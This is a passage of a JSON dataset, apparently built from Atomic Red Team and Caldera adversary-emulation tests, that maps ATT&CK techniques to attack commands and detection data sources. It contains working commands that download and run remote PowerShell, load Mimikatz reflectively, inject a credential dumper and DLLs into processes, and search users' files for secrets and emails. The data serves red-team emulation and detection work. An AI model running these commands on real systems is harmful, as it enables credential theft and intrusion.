available information about Group Policy. More parameters can be found in the linked Microsoft documentation\nhttps://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult\nhttps://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\nTurla has used the /z and /v parameters: https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "gpresult /z\n" + } + }, + { + "name": "Get-DomainGPO to display group policy information via PowerView", + "auto_generated_guid": "4e524c4e-0e02-49aa-8df5-93f3f7959b9f", + "description": "Use PowerView to Get-DomainGPO This will only work on Windows 10 Enterprise and A DC Windows 2019.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://github.com/BC-SECURITY/Empire/blob/86921fbbf4945441e2f9d9e7712c5a6e96eed0f3/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO\"", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "WinPwn - GPOAudit", + "auto_generated_guid": "bc25c04b-841e-4965-855f-d1f645d7ab73", + "description": "Check domain Group policies for common misconfigurations using Grouper2 via GPOAudit function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nGPOAudit -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - GPORemoteAccessPolicy", + "auto_generated_guid": "7230d01a-0a72-4bd5-9d7f-c6d472bc6a59", + "description": "Enumerate 
remote access policies through group policy using GPORemoteAccessPolicy function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nGPORemoteAccessPolicy -consoleoutput -noninteractive", + "name": "powershell" + } + }, + { + "name": "MSFT Get-GPO Cmdlet", + "auto_generated_guid": "52778a8f-a10b-41a4-9eae-52ddb74072bf", + "description": "The Get-GPO cmdlet gets one Group Policy Object (GPO) or all the GPOs in a domain. Tested on Windows Server 2019 as a domain user with computer joined to domain. Reference: https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "gpo_output": { + "description": "The output of the Get-GPO cmdlet", + "type": "String", + "default": "$env:temp\\GPO_Output.txt" + }, + "gpo_param": { + "description": "You can specify a GPO by its display name or by its globally unique identifier (GUID) to get a single GPO, or you can get all the GPOs in the domain through the All parameter", + "type": "string", + "default": "-All" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Add Rsat.ActiveDirectory.DS", + "prereq_command": "if(Get-WindowsCapability -Online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 | Where-Object { $_.State -eq 'Installed' }){ exit 0 } else { exit 1 }", + "get_prereq_command": "Add-WindowsCapability -online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" + }, + { + "description": "Add Rsat.GroupPolicy.Management.Tools ###Two RSAT Modules needed for this to work on Win10, WinServer 2019 works by default. 
This will take a long time (almost 2 minutes) to install RSAT Manually###.", + "prereq_command": "if(Get-WindowsCapability -Online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0 | Where-Object { $_.State -eq 'Installed' }){ exit 0 } else { exit 1 }", + "get_prereq_command": "Add-WindowsCapability -online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0" + } + ], + "executor": { + "command": "Get-GPO -Domain $ENV:userdnsdomain #{gpo_param} >> #{gpo_output}", + "cleanup_command": "del $env:temp\\GPO_Output.txt -erroraction silentlycontinue", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1620", + "command_list": [ + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nmimiload -consoleoutput -noninteractive" + ], + "commands": [ + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nmimiload -consoleoutput -noninteractive", + "source": "atomics/T1620/T1620.yaml", + "name": "Atomic Red Team Test - Reflective Code Loading" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1620", + "display_name": "Reflective Code Loading", + "atomic_tests": [ + { + "name": "WinPwn - Reflectively load Mimik@tz into memory", + "auto_generated_guid": "56b9589c-9170-4682-8c3d-33b86ecb5119", + "description": "Reflectively load Mimik@tz into memory technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object 
net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nmimiload -consoleoutput -noninteractive", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1005", + "command_list": [ + "pip install stormssh && storm list\n", + "pip install -q stormssh 2> /dev/null && storm list | sed 's/\\x1b\\[[0-9;]*m//g'\n", + "find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o \"\\b[A-Za-z0-9._%+-]+@#{target.org.name}\\b\" 2>/dev/null {} \\;\n", + "for directoryname in $(find /home/ -name '.git' -type d 2>/dev/null | head -5); do\n\tprintf \"$(dirname \"$directoryname\")\\n\";\ndone;\n", + "Get-ChildItem C:\\Users -Attributes Directory+Hidden -ErrorAction SilentlyContinue -Filter \".git\" -Recurse | foreach {$_.parent.FullName} | Select-Object; exit 0;\n", + "curl #{remote.host.socket}\n", + "find /Users -name '*.#{file.sensitive.extension}' -type f -not -path '*/\\.*' -size -500k 2>/dev/null | head -5\n", + "Get-ChildItem C:\\Users -Recurse -Include *.#{file.sensitive.extension} -ErrorAction 'SilentlyContinue' | foreach {$_.FullName} | Select-Object -first 5;\nexit 0;\n", + "find / -name '*.#{file.sensitive.extension}' -type f -not -path '*/\\.*' -size -500k 2>/dev/null | head -5\n", + "find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o \"(($(echo #{domain.broadcast.ip} | cut -d. 
-f-2))\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\" 2>/dev/null {} \\;\n", + "powershell/collection/get_sql_column_sample_data", + "powershell/collection/get_sql_query", + "powershell/collection/minidump", + "powershell/credentials/sessiongopher", + "python/collection/osx/browser_dump", + "python/collection/osx/imessage_dump", + "python/situational_awareness/host/osx/situational_awareness" + ], + "commands": [ + { + "command": "pip install stormssh && storm list\n", + "source": "data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml", + "name": "Search for valid SSH commands in the config file" + }, + { + "command": "pip install -q stormssh 2> /dev/null && storm list | sed 's/\\x1b\\[[0-9;]*m//g'\n", + "source": "data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml", + "name": "Search for valid SSH commands in the config file" + }, + { + "command": "find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o \"\\b[A-Za-z0-9._%+-]+@#{target.org.name}\\b\" 2>/dev/null {} \\;\n", + "source": "data/abilities/collection/1f7ff232-ebf8-42bf-a3c4-657855794cfe.yml", + "name": "Grep for all emails for the given target company" + }, + { + "command": "for directoryname in $(find /home/ -name '.git' -type d 2>/dev/null | head -5); do\n\tprintf \"$(dirname \"$directoryname\")\\n\";\ndone;\n", + "source": "data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml", + "name": "This ability will locate directories that are cloned Git repositories." + }, + { + "command": "Get-ChildItem C:\\Users -Attributes Directory+Hidden -ErrorAction SilentlyContinue -Filter \".git\" -Recurse | foreach {$_.parent.FullName} | Select-Object; exit 0;\n", + "source": "data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml", + "name": "This ability will locate directories that are cloned Git repositories." 
+ }, + { + "command": "curl #{remote.host.socket}\n", + "source": "data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml", + "name": "See the raw content of a socket" + }, + { + "command": "find /Users -name '*.#{file.sensitive.extension}' -type f -not -path '*/\\.*' -size -500k 2>/dev/null | head -5\n", + "source": "data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml", + "name": "Locate files deemed sensitive" + }, + { + "command": "Get-ChildItem C:\\Users -Recurse -Include *.#{file.sensitive.extension} -ErrorAction 'SilentlyContinue' | foreach {$_.FullName} | Select-Object -first 5;\nexit 0;\n", + "source": "data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml", + "name": "Locate files deemed sensitive" + }, + { + "command": "find / -name '*.#{file.sensitive.extension}' -type f -not -path '*/\\.*' -size -500k 2>/dev/null | head -5\n", + "source": "data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml", + "name": "Locate files deemed sensitive" + }, + { + "command": "find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o \"(($(echo #{domain.broadcast.ip} | cut -d. 
-f-2))\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\" 2>/dev/null {} \\;\n", + "source": "data/abilities/collection/d69e8660-62c9-431e-87eb-8cf6bd4e35cf.yml", + "name": "Grep for IP addresses in file system per user" + }, + { + "command": "powershell/collection/get_sql_column_sample_data", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/get_sql_query", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/minidump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/sessiongopher", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/browser_dump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/imessage_dump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/host/osx/situational_awareness", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "id": "02de522f-7e0a-4544-8afc-0c195f400f5f", + "name": "Parse SSH config", + "description": "Search for valid SSH commands in the config file", + "tactic": "collection", + "technique": { + "attack_id": "T1005", + "name": "Data from Local System" + }, + "platforms": { + "darwin": { + "sh": { + "command": "pip install 
stormssh && storm list\n", + "parsers": { + "plugins.stockpile.app.parsers.ssh": [ + { + "source": "remote.ssh.cmd" + } + ] + } + } + }, + "linux": { + "sh": { + "command": "pip install -q stormssh 2> /dev/null && storm list | sed 's/\\x1b\\[[0-9;]*m//g'\n", + "parsers": { + "plugins.stockpile.app.parsers.ssh": [ + { + "source": "remote.ssh.cmd" + } + ] + } + } + } + } + }, + { + "id": "1f7ff232-ebf8-42bf-a3c4-657855794cfe", + "name": "Find company emails", + "description": "Grep for all emails for the given target company", + "tactic": "collection", + "technique": { + "attack_id": "T1005", + "name": "Data from Local System" + }, + "platforms": { + "darwin": { + "sh": { + "command": "find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o \"\\b[A-Za-z0-9._%+-]+@#{target.org.name}\\b\" 2>/dev/null {} \\;\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.user.name" + } + ] + } + ] + }, + { + "id": "720a3356-eee1-4015-9135-0fc08f7eb2d5", + "name": "Find Git Repositories", + "description": "This ability will locate directories that are cloned Git repositories.", + "tactic": "collection", + "technique": { + "attack_id": "T1005", + "name": "Data from Local System" + }, + "platforms": { + "linux": { + "sh": { + "command": "for directoryname in $(find /home/ -name '.git' -type d 2>/dev/null | head -5); do\n\tprintf \"$(dirname \"$directoryname\")\\n\";\ndone;\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.git" + } + ] + } + } + }, + "windows": { + "psh,pwsh": { + "command": "Get-ChildItem C:\\Users -Attributes Directory+Hidden -ErrorAction SilentlyContinue -Filter \".git\" -Recurse | foreach {$_.parent.FullName} | Select-Object; exit 0;\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.git" + } + ] + } + } + } + } + }, + { + "id": "89955f55-529d-4d58-bed4-fed9e42515ec", + "name": "cURL socket 
address", + "description": "See the raw content of a socket", + "tactic": "collection", + "technique": { + "attack_id": "T1005", + "name": "Data from Local System" + }, + "platforms": { + "darwin": { + "sh": { + "command": "curl #{remote.host.socket}\n" + } + }, + "linux": { + "sh": { + "command": "curl #{remote.host.socket}\n" + } + } + } + }, + { + "id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b", + "name": "Find files", + "description": "Locate files deemed sensitive", + "tactic": "collection", + "technique": { + "attack_id": "T1005", + "name": "Data from Local System" + }, + "platforms": { + "darwin": { + "sh": { + "command": "find /Users -name '*.#{file.sensitive.extension}' -type f -not -path '*/\\.*' -size -500k 2>/dev/null | head -5\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.file.path", + "edge": "has_extension", + "target": "file.sensitive.extension" + } + ] + } + } + }, + "windows": { + "psh,pwsh": { + "command": "Get-ChildItem C:\\Users -Recurse -Include *.#{file.sensitive.extension} -ErrorAction 'SilentlyContinue' | foreach {$_.FullName} | Select-Object -first 5;\nexit 0;\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.file.path", + "edge": "has_extension", + "target": "file.sensitive.extension" + } + ] + } + } + }, + "linux": { + "sh": { + "command": "find / -name '*.#{file.sensitive.extension}' -type f -not -path '*/\\.*' -size -500k 2>/dev/null | head -5\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.file.path", + "edge": "has_extension", + "target": "file.sensitive.extension" + } + ] + } + } + } + } + }, + { + "id": "d69e8660-62c9-431e-87eb-8cf6bd4e35cf", + "name": "Find IP addresses", + "description": "Grep for IP addresses in file system per user", + "tactic": "collection", + "technique": { + "attack_id": "T1005", + "name": "Data from Local System" + }, + "platforms": { + "darwin": { + "sh": { + "command": "find $(echo ~#{host.user.name}) 
-type f -size -500k -maxdepth 5 -exec grep -EIr -o \"(($(echo #{domain.broadcast.ip} | cut -d. -f-2))\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\" 2>/dev/null {} \\;\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.user.name" + } + ] + } + ] + }, + { + "Empire Module": "powershell/collection/get_sql_column_sample_data", + "ATT&CK Technique #1": "T1005", + "ATT&CK Technique #2": "", + "Technique": "Data from Local System", + "Concatenate for Python Dictionary": "\"powershell/collection/get_sql_column_sample_data\": [\"T1005\"]," + }, + { + "Empire Module": "powershell/collection/get_sql_query", + "ATT&CK Technique #1": "T1005", + "ATT&CK Technique #2": "", + "Technique": "Data from Local System", + "Concatenate for Python Dictionary": "\"powershell/collection/get_sql_query\": [\"T1005\"]," + }, + { + "Empire Module": "powershell/collection/minidump", + "ATT&CK Technique #1": "T1005", + "ATT&CK Technique #2": "", + "Technique": "Data from Local System", + "Concatenate for Python Dictionary": "\"powershell/collection/minidump\": [\"T1005\"]," + }, + { + "Empire Module": "powershell/credentials/sessiongopher", + "ATT&CK Technique #1": "T1005", + "ATT&CK Technique #2": "T1145", + "Technique": "Data from Local System", + "Concatenate for Python Dictionary": "\"powershell/credentials/sessiongopher\": [\"T1005\",\"T1145\"]," + }, + { + "Empire Module": "python/collection/osx/browser_dump", + "ATT&CK Technique #1": "T1005", + "ATT&CK Technique #2": "", + "Technique": "Data from Local System", + "Concatenate for Python Dictionary": "\"python/collection/osx/browser_dump\": [\"T1005\"]," + }, + { + "Empire Module": "python/collection/osx/imessage_dump", + "ATT&CK Technique #1": "T1005", + "ATT&CK Technique #2": "", + "Technique": "Data from Local System", + "Concatenate for Python Dictionary": "\"python/collection/osx/imessage_dump\": [\"T1005\"]," + }, + { + "Empire 
Module": "python/situational_awareness/host/osx/situational_awareness", + "ATT&CK Technique #1": "T1005", + "ATT&CK Technique #2": "T1082", + "Technique": "Data from Local System", + "Concatenate for Python Dictionary": "\"python/situational_awareness/host/osx/situational_awareness\": [\"T1005\",\"T1082\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "200-500", + " 4100-4104", + "PowerShell logs" + ], + [ + "4663", + "File monitoring" + ], + [ + "5861", + "WMI" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "200-500", + " 4100-4104", + "PowerShell logs" + ], + [ + "4663", + "File monitoring" + ], + [ + "5861", + "WMI" + ], + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf", + "https://www.justice.gov/opa/press-release/file/1121706/download", + "https://www.justice.gov/file/1080281/download", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + 
"https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.secureworks.com/research/bronze-union", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "http://carnal0wnage.attackresearch.com/2012/09/more-on-aptsim.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1055.002", + "command_list": [ + "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"file\",\"debugger.dll\");\n$PBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -PBytes $PBytes -verbose", + "$url=\"#{server}/file/download\";\n$wc=New-Object 
System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"shared.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$PEBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -verbose -PBytes $PEbytes -ProcId #{host.process.id}\n", + "$explorer = Get-Process -Name explorer;\nmavinject.exe $explorer.id C:\\Users\\Public\\sandcat.dll\n" + ], + "commands": [ + { + "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"file\",\"debugger.dll\");\n$PBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -PBytes $PBytes -verbose", + "source": "data/abilities/credential-access/c9f2c7ae-0092-4ea0-b9ae-92014eba7ce7.yml", + "name": "Injects cred dumper exe into an available process" + }, + { + "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"shared.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$PEBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -verbose -PBytes $PEbytes -ProcId #{host.process.id}\n", + "source": "data/abilities/defense-evasion/a398986f-31b0-436a-87e9-c8e82c028f3c.yml", + "name": "Injects sandcat DLL into an available process" + }, + { + "command": "$explorer = Get-Process -Name explorer;\nmavinject.exe $explorer.id C:\\Users\\Public\\sandcat.dll\n", + "source": "data/abilities/defense-evasion/e5bcefee-262d-4568-a261-e8a20855ec81.yml", + "name": "Leverage Mavinject (signed binary) for DLL injection" + } + ], + 
"parsed_datasets": [ + { + "id": "c9f2c7ae-0092-4ea0-b9ae-92014eba7ce7", + "name": "Inject Cred dumper into process (Spookier)", + "description": "Injects cred dumper exe into an available process", + "tactic": "credential-access", + "technique": { + "attack_id": "T1055.002", + "name": "Process Injection: Portable Executable Injection" + }, + "platforms": { + "windows": { + "psh": { + "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"file\",\"debugger.dll\");\n$PBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -PBytes $PBytes -verbose" + } + } + } + }, + { + "id": "a398986f-31b0-436a-87e9-c8e82c028f3c", + "name": "Inject Sandcat into process", + "description": "Injects sandcat DLL into an available process", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1055.002", + "name": "Process Injection: Portable Executable Injection" + }, + "platforms": { + "windows": { + "psh": { + "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"shared.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$PEBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -verbose -PBytes $PEbytes -ProcId #{host.process.id}\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.process.id" + } + ] + } + ] + }, + { + "id": "e5bcefee-262d-4568-a261-e8a20855ec81", + "name": "Signed Binary Execution - Mavinject", + "description": "Leverage Mavinject (signed binary) for DLL injection", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1055.002", + "name": 
"Process Injection: Portable Executable Injection" + }, + "platforms": { + "windows": { + "psh": { + "command": "$explorer = Get-Process -Name explorer;\nmavinject.exe $explorer.id C:\\Users\\Public\\sandcat.dll\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was 
accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1497.003", + "command_list": [ + "sleep 60" + ], + "commands": [ + { + "command": "sleep 60", + "source": "data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml", + "name": "Pause all operations to avoid making noise" + } + ], + "parsed_datasets": [ + { + "id": "36eecb80-ede3-442b-8774-956e906aff02", + "name": "1-min sleep", + "description": "Pause all operations to avoid making noise", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1497.003", + "name": "Virtualization/Sandbox Evasion: Time Based Evasion" + }, + "platforms": { + "darwin": { + "sh": { + "command": "sleep 60" + } + }, + "linux": { + "sh": { + "command": "sleep 60" + } + }, + "windows": { + "psh": { + "command": "sleep 60" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", 